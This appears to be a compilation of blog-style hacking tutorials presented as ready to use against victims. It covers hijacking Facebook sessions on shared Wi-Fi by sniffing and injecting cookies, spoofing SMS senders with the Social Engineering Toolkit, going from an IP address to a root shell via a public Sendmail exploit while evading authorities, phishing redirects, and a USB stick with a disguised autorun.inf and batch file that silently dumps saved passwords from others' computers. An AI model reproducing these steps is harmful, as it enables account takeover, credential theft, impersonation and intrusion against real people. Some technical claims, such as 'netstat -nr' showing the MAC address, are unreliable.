#Cookie Stealing Attack...
Using this method you can hack Any Account like
Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.
This is my favorite method. this is work only At
LAN(local Area Network) . its best place to hack at university, cafe , public
place where computer are on one LAN simple Example WI-Fi.
#What is Cookies And how the use of stealing
cookies?
Cookies are file’s that stored on
Any computer’s By any website when a you visits them . the cookie used by the
web server to check the authenticate the Real user .like you Enter Login in
Facebook then a unique string’s Generated and the one copy saved in the web
server and other is saved on your Browser as a Cookie file . both are matched
when you open a Account.
so then finally we will start.
Step#1
Download the Wire Shark and install it.
Link : @comment
Step#2
Next open the wire shark and then click on
interface.
Step#3
Next choose a interface which is received and
sending packet and click on start.
Step#4
Continue the sniffing for around like 10 minutes.
Step#5
After a maximum 10 minute stop the sniffing by
going to a capture menu.
Step#6
its important step,
now filter to http.cookie contains “datr”. Then
filter the all search for http cookies with a name of datr and there is
Facebook authentication’s cookie.
Step#7
Now click on it and then goto the copy > Bytes
> Printable Text only
Step #8
Now for next step you must have 3 thing,
1. Mozilla Firefox [browser]
2. Grease Monkey[add-on]
3. Cookie injector[code]
All links @ comments
and then open facebook.com make sure you are not
login
Step #9
Press the button Alt C to bring up a cookie
injector and then Simply paste in a cookie value into it.
Step #10
Now refresh your page so then finally you Enter the
Victim Account.
/* Only for Educational Purpose */
How To Change Your MAC Address...."MAC
Address Spoofing".....
The simplest & fastest method without
downloading any softwares.
So far i have tried this without any trouble on
Windows 7 & Vista. should work for XP too, give it a shot and let me know
how it goes.
#Tools Needed :
* Windows 7,Vista,XP,8
* Wireless Network Adapter
* Common sense
# Lets Begin :
1) Click “Start button” and type “command” in
search box, click on Command Prompt.
2) Type “netstat -nr” to check your current MAC
address.
3) Now click on your “Start Button” again and type
in Device and click “Device Manager”.
4) When the device manager loads, scroll down to
your network adapters and look for your wireless network adapater.
5) Double click on your wireless network adapter
and a screen will appear.
6) Next click on the “Advanced” Tab.
7) Scroll down the “property” list and look for
network address.
Click
on the “value” tickbox and key in a 12 digit mac address, for example i am
going to use 6666666666ab. Click ok and close all the device manager screens.
9) Finally, start up your wireless and you are good
to go!
10) Type netstat -nr to check your new MAC address.
#diCod3r....
Double your uTorrent Speed!! Get Double Speed...
After trying all the methods available in the
internet i was failed to increase uTorrent download speed maybe 1-2kb which is
not worth of effort. But lucky me i got a great trick to double your uTorrent
speed and this really works. Give it a try i am sure you will not be unhappy.
# What is uTorrent:
uTorrent is a software that lets you download files from
multiple other people at once. Torrent technology is often faster than other
forms of downloading since each user gives different parts of the same file to
everyone else downloading the file. To increase the speed more just you need to
do a few steps.
To start/perform this trick you have to download
and install a software.
Download : Cheat Engine 6.1\6.2
Your anti-virus may give warning just ignore that
or you may have to turn off your anti-virus to download/install this software.
STEPS:
*Now run Cheat Engine and uTorrent both.
*In Cheat Engine you will find one computer
icon.[below file menu]
Click on this and now you will find one process
list select uTorrent from the process list and click open.
* Now again click the computer icon and select the
uTorrent process and under open you will get one option "Attach debugger
to process". Click on it.
* Now you will get one confirmation box. Click yes.
* Now on Cheat Engine check the option "Enable
Speedhack". You will get speed box. Make it 0.5 . Click Apply.
* It's Done!! Check your speed. It just increased
to double.
Note: Don't Close Cheat Engine
3nj0yy....#diCod3r....
# Hacking Mobile Number Duplicate/Create And
Send SMS By It....
This is my First post about mobile hacking,In
this post,We are going to create any mobile number
(police,firedepartment,girlfriends,etc) andsendmessages,Sure this method has
only 75% success rate,but it works like a charm for the most time.In spoofing
attack the attacker (you) make himself a source or desire address.This post is
only for education purposes,and this trick can be
traced back to the source very easily,So don't create a scene.
So What Do WE Need : #SET - Social Engineering
Toolkit, Available On Backtrack.
Step 1 :
Open "Social Engineering Toolkit" in
Backtrack 5 (mine OS) by Opening your backtrack console &Typing
cd/pentest/exploits/set
Step 2 : Once the directory is
opened,Type"./set" to fire up the social attacking kit.
Step 3 :
Now select option number 7.This module allows you
to specially craft SMS messages and send them to a person. You can spoof the
SMS source if you want to,its not that hard.
Step 4 :
Now select option 1 "Perform a SMS Spoofing
Attack”
Step 5 : Select how the "spoofed-sms"
should distribute,you could send it to many people or just one,Yourchoice.
Step 6 :
Now you need to enter the number of the receiver
(victim), make sure to enter with country code.Example : +9188260xxxxx for
India.
Step 7 :
Now select 1 for pre-defined Templates,that is
helpful to newbies, of- course you can createyour own.
Step 8 :
On this step you need to choose the templates,I will
choose the"Boss" one,you can use accordingto your situation.
Step 9 :
Now you need to select the service which will send
that crafted SMS you created,You can choose whatever-the- hell you want,If you
have an Android Emulator that is just great.
Step 10 :Yeap ! You just send an spoofed
message,which is capable of stopping war or creating it,depends on you.
#3nj0yy....#diCød3r...
Most Populer 8 ways to
access blocked websites....
1. Using IP instead of URL
2.Redirection with short URL service
3. Google cache
4. Internet Archive – Wayback Machine
5.Anonymous surfing
- Hidemyass.com
- anonymizer.com
- wujie.net
- ultrareach.net
6. Use Proxy in Browsers
7. Bypass with translation services
8. Retrieve web pages via Email
- www.@web2mail.com
Gooogle them for more info......
Set up:
1. You must have a .zip or .rar compressor.
Steps:
1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd "desktop" with the
quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg +
foldername.zip outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg
extension on the desktop. ( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden
files Type: ren outputfilename.jpg outputfilename.rar or .zip
Did you know how much stuff you can do with an ip address?
There is a plenty of tutorials that go into how to get
an IP Address from the preferred mark of your choice. Now I will not go into
that subject. Alright so say we got the targets IP Address finally. What do we
do with this IP Address. Well first you should ping the IP Address to make sure
that its alive or how we say online. Now at the bottom I will include some
links where you can get some key tools that may help on your journey through
the electronic jungle. So we need to find places to get inside of the computer
so we can start trying to find a way to "hack" that. Port Scanners
are used to identify the open ports on a machine thats running on a network,
whether its a router, or a desktop computer, they all have ports. Protocols use
these ports to communicate with other services and resources on the
network. Well Blues Port Scanner will scan the IP address that you chose
and identify open ports that are on the target box.
Blues Port Scaner you can download from here:
For example:
Idlescan using Zombie <Domain Name> (192.150.13.111:80); Class:
Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https 1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown
In example we see that there are a variety of ports open on this box. Take note
of all the ports that you see listed before you. Most of them will be paired up
with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc.). Take
all that information and paste it into notepad or the editor of your choice.
This is the beginning of your targets record. So now we know what ports are
open. These are all theoretical points of entry where we could wiggle into the
computer system. But we all know its not that easy. Alright so we dont even
know what type of software or what operating system that this system is
running.
NMAP the Port Scanner has unique OS fingerprinting methods so when the program
sees a certain series of ports open it uses its best judgement to guess what
operating system its running.
NMAP you can download here:
So we have to figure out what type of software this box is running if we are
gonna start hacking the thing right? Many of you have used TELNET for your MUDS
and MOOS and weird multiplayer text dungeons and many of you havent even heard
of it before period. TELNET is used to open a remote connection to an IP
Address through a Port. So this means is we are accessing their computer from
across the internet, all we need is their IP address and a port number. With
that record you are starting to compile, open a TELNET connection to the IP
Address and enter one of the open ports that you found on the target.
So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a
connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text
at the very top of the screen. You may think how is text going to help me. Well
It will. Get that list you are starting to write, and copy the banners into
your compilation of the information youve gathered on your target.
Banners/Headers are what you get when you TELNET to the open ports. Heres an
example of a banner from port 25.
220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005
01:22:29 -0400
Now this is a very important part in the enumeration process. You notice it
says 'Sendmail 8.12.8/8.12.8' Well what do you know, we now have discovered a
version number. This is where we can start identifying the programs running on
the machine. There are some instances in which companies will try and falsify
their headers/banners so hackers are unable to find out what programs are truly
installed. Now just copy all the banners from all the open ports *Some Ports
May Have No Bannners* and organize them in the little record we have of the
target. Now we have all the open ports, and a list of the programs running and
their version numbers. This is some of the most sensitive information you can
come across in the networking world. Other points of interest may be the DNS
server, that contains lots of information and if you are able to manipulate it
than you can pretend to hotmail, and steal a bunch of peoples email. Well now
back to the task. Apart from actual company secrets and secret configurations
of the network hardware, you got some good juicy info.
http://www.securityfocus.com is
a very good resource for looking up software vulnerabilities. If you cant find
any vulnerabilities there, search on google. There are many, many, many other sites
that post vulnerabilities that their groups find and their affiliates.
At SecurityFocus you can search through vendor and whatnot to try and find your
peice of software, or you can use the search box. When i searched SecurityFocus
i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof
of concept code where they wrote the shellcode and everything, so if you ran
the code with the right syntax, a command prompt would just spawn. You should
notice a (#) on the line where your code is being typed. That pound symbol
means that the command prompt window thats currently open was opened as root.
The highest privilage on a UNIX/Linux Box. You have just successfully hacked a
box. Now that you have a command shell in front of you, you can start doing
whatever you want, delete everything if you want to be a jerk, however
that is not recommended. Maybe leave a text file saying how you did it and that
they should patch their system. Whoever they are. And many times the best thing
you can do is just lay in the shadows,dont let anyone know what you did. More
often than not this is the path you are going to want to take to avoid unwanted
visits by the authorities.
There are many types of exploits out there, some are Denial of Service
exploits, where you shut down a box, or render an application/process unusable.
Called denial of service simply because you are denying a service on someones
box to everyone trying to access it. Buffer Overflow exploits are involved when
a variable inside some code doesnt have any input validation. Each letter you
enter in for the string variable will be 1 byte long. Now where the variables
are located at when they are in use by a program is called the buffer. Now what
do you think overflowing the buffer means. We overflow the buffer so we can get
to a totally different memory address. Then people write whats called shellcode
in hex. This shellcode is what returns that command prompt when you run the
exploit. That wasnt the best description of a buffer overflow, however all you
need to remember is that garbage data fills up the data registers so then the
buffer overflows and allows for remote execution of almost every command
available. There are many, many other types of attacks that cannot all be
described here, like man-in-the-middle attacks where you spoof who you are.
Performed correctly, the slave will enter
http://www.bank.com and his connection will be
redirected to your site where you can make a username and password box, make
the site look legit. And your poor mark will enter their credentials into your
site, when they think its really
http://www.bank.com. You need to have a small script set up
so it will automatiically display like an error or something once they try and
log in with their credentials. This makes it seem like the site is down and the
slave doenst give it a second thought and will simply try again later.
So as a summary of how to own a box when you only have an IP
Address
Method Works On both *Nix and Windoze
You can do the same with domain names (IE google.com) than what you can with IP
Addresses. Run a whois Lookup or something along those lines. Or check up on
InterNIC you should be able to resolve the domain name to an IP address.
- Port Scan The Address And Record Open Ports
- Telnet To Open Ports To Identify Software Running On Ports
netcat - Network swiss army knife. Like TELNET only better and with a lot more
functionality. Both can be used when you are trying to fingerprint software on
open ports
- Record Banners And Take Note Of The Application Running and The Version
Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any
vulnerabilities then search google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.
I will not teach you how to cover your track. This is prohibited and i put that
here only for informational reasons.
Now I will show you how to hack Passwords using your USB
Drive.If you didn't know Windows stores most of passwords which are used on a
daily basis, including instant messenger passwords such as MSN, Yahoo, AOL,
Windows messenger... Windows also stores passwords o SMTP, POP, FTP, Outlook
Express accounts and auto-complete passwords of many browsers like Firefox or
Google chrome. There exists many tools for recovering these passswords from
their stored places. Using these tools and an USB you can create your own
rootkit to hack passwords from your friend’s/college Computer. We need the
following tools to create our rootkit:
MessenPass: Recovers the passwords of MSN Messenger Windows Messenger (In
Windows XP) Windows Live Messenger (In Windows XP/Vista/7) Yahoo Messenger
(Versions 5.x and 6.x)
Google TalkICQ Lite 4.x/5.x/2003AOL Instant Messenger v4.6 or below, AIM 6.x,
and AIM Pro, Trillian TrillianAstraMiranda GAIM/Pidginn MySpace IM PaltalkSceneDigsby
Download MassenPass here:
Download
Mail PassView: Recovers the passwords of Outlook Express Microsoft Outlook 2000
(POP3 and SMTP Accounts only) Microsoft Outlook 2002/2003/2007/2010 (POP3,
IMAP, HTTP and SMTP Accounts) Windows Mail Windows Live Mail IncrediMail Eudora
Netscape 6.x/7.x (If the password is not encrypted with master password)
Mozilla Thunderbird (If the password is not encrypted with master password)
Group Mail Free Yahoo! Mail - If the password is saved in Yahoo! Messenger
application. Hotmail/MSN mail - If the password is saved in MSN/Windows/Live
Messenger application. Gmail - If the password is saved by Gmail Notifier
application, Google Desktop, or by Google Talk.
Download Mail Pass View here:
Download
IE PassView: reveals the passwords stored by Internet Explorer browser. It
supports Internet explorer, v4.0 – v9.0
Download IE PassView here:
Download
PasswordFox: reveals passwords stored by Mozila Firefox, suport all versions
Download PasswordFox here:
Download
ChromePass: reveals passwords stored by Google Chrome, suport all versions
Download ChromePass here:
Download
Here is tutorial about how to create the password hacking toolkit:
NOTE: You must disable your antivirus when you doing this steps.
Download all the tools, extract them and copy only .exe files into your USB.
- Copy the files - mspass.exe, mailpv.exe, iepv.exe, chromepass.exe and
passwordfox.exe into your USB Drive.
Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it to autorun.inf
Now copy the autorun.inf file onto your.
3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start chromepass.exe /stext chromepass.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are set to hack the passwords. You can use
this
USB whatever PC you want. Just follow these steps
Insert the pendrive and the autorun window will pop-up. (This is because, we
have created an autorun USB).
In the pop-up window, select the first option (Perform a Virus Scan).
Now all the password hacking tools will silently get executed in the
background. The passwords get stored in the .TXT files.
Remove the USB and you’ll see the stored passwords in the .txt files. This hack
works on all windows.
- This procedure will only recover the stored passwords on the Computer.
